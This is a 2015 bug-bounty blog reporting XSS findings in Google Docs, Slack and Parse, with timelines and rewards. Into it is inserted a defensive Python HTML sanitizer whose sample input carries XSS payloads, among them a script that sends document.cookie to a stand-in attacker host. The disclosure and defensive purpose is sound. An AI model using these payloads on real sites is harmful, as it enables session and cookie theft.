Sunday, November 29, 2015

Stored XSS in Google Docs (Bug Bounty)

I have found a Stored Cross-Site Scripting vulnerability in Google Docs (https://docs.google.com). The XSS was pretty simple, and at first I was not expecting a reward. The vulnerability lies within the main Google Docs interface (creating a document). To reproduce, create an HTML file embedded with the payload. Then save it as HTML and open it. Drag and drop the produced XSS vector into Google Docs and the XSS will pop. The vulnerability was fixed by Google within a week (pretty fast). I also received a bounty and was listed in their Hall of Fame. I got the "Elite (31337/eleet)" reward.
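The write-up above describes the pattern (markup from a dropped file lands in the editor's document unfiltered) but not the payload. The following is an added example, not the author's payload and not Google's code: a constructed allow-list sanitizer of the kind an HTML importer needs, shown beside the "trust the file" behaviour that makes such an import a stored XSS sink. The tag and attribute policy, the function names and the sample markup are all assumptions made for the illustration.

```python
"""Allow-list sanitizer for HTML that a rich-text editor imports (file drop,
paste, or any other path that turns user markup into DOM).

Constructed example for illustration; not the code of any product named on
this page. The policy below (which tags/attributes survive) is an assumption."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "code", "pre",
                "h1", "h2", "h3", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
DROP_CONTENT = {"script", "style"}  # remove the element *and* its text


def import_unsanitized(markup: str) -> str:
    """What a vulnerable importer effectively does: trust the file's markup."""
    return markup


def _safe_url(url: str) -> bool:
    # Collapse whitespace so "java\tscript:" cannot smuggle a scheme past us.
    # HTMLParser has already decoded entities such as &#106; by this point.
    compact = "".join(url.split()).lower()
    if ":" not in compact:
        return True  # relative URL, no scheme at all
    return compact.startswith(SAFE_SCHEMES)


class _Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.open: list[str] = []  # allowed tags still open, for balancing
        self.drop_depth = 0        # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag vanishes; its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on*=, style=, srcdoc=, ...
            value = value or ""
            if name in ("href", "src") and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.drop_depth = max(0, self.drop_depth - 1)
            return
        if self.drop_depth or tag not in self.open:
            return  # stray or disallowed close tag
        while self.open:  # close anything left open inside it, then the tag
            inner = self.open.pop()
            self.out.append(f"</{inner}>")
            if inner == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data))  # re-escape the decoded text

    def result(self) -> str:
        self.close()
        while self.open:
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_import(markup: str) -> str:
    """Return markup that is safe to insert into the editor's document."""
    s = _Sanitizer()
    s.feed(markup)
    return s.result()


if __name__ == "__main__":
    # Constructed sample of what a dropped .html file might carry.
    dropped_file = (
        '<p>Quarterly <b>report</b></p>'
        '<img src=x onerror="alert(document.domain)">'
        '<a href="&#106;avascript:alert(1)" onclick="steal()">link</a>'
        '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>'
    )
    print("vulnerable importer keeps:", import_unsanitized(dropped_file))
    print("sanitizer keeps:          ", sanitize_import(dropped_file))
```

The point to take from the side-by-side run: the sanitizer is an allow-list, so event-handler attributes, `javascript:` URLs (including entity-encoded or whitespace-split spellings) and `<script>` bodies never need to be recognised individually; anything the policy does not name is gone, while the harmless formatting survives. Text nodes are re-escaped on output, which is the same property a "format as code" or emoji-rendering path needs when it inserts user text into HTML.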


Image POC:

Video POC:


Timeline:

November 4 ----- Reported
November 5 ----- Report was Triaged
November 6 ----- A bug was filed according to Michael J. (Google Security Team)
November 12 ---- Rewarded by Google Security Team

Reward:

$3,133.7 


Friday, November 13, 2015

Stored XSS in Slack via emoji (Bug Bounty)

I have found ANOTHER cross-site scripting vulnerability in Slack. This time, a Stored one, the most dangerous of all XSS... Anyway, the payload I used is very unique: the XSS has to be popped through an emoji. The Slack security team fixed this pretty fast since the XSS is a Stored one. This was my third bug from Slack, and I immediately rose to the Top 26 in their thanks page (https://hackerone.com/slack/thanks/). For more details regarding my report, just visit this link: https://hackerone.com/reports/96337


Image POC:


Reward:

$500

Reflected XSS in Slack (Bug Bounty)

I have found another Cross-Site Scripting vulnerability in Slack. This time it is a Reflected XSS. The XSS was located in the team integration search bar. The bug was fixed immediately by the Slack security team. This was my second bug from Slack. You can read more about my report at this link: https://hackerone.com/reports/97683

Image:


Reward:

$100 

XSS in Slack (Bug bounty)

I have found a Cross-Site Scripting vulnerability in Slack. The XSS lies in the creation of a new post. The XSS can be triggered by formatting text as code. Just type in the payload, then change it to code format. The bug has been fixed by the Slack security team. The link to my report can be found here: https://hackerone.com/reports/89505


Image POC:

Reward:

$100 

Stored XSS in Parse (Bug Bounty)

I found a Stored Cross-Site Scripting vulnerability in Parse, a Facebook acquisition. The Stored XSS was located in the App dashboard. I reported it to Facebook, and they rewarded me with a $1000 bounty; I was also listed in their "Whitehat List" for the year 2015. The issue was fixed by the Facebook security team. Here is the video for more details.
WhiteHat list: https://www.facebook.com/whitehat/thanks


Video:

Reward:

$1000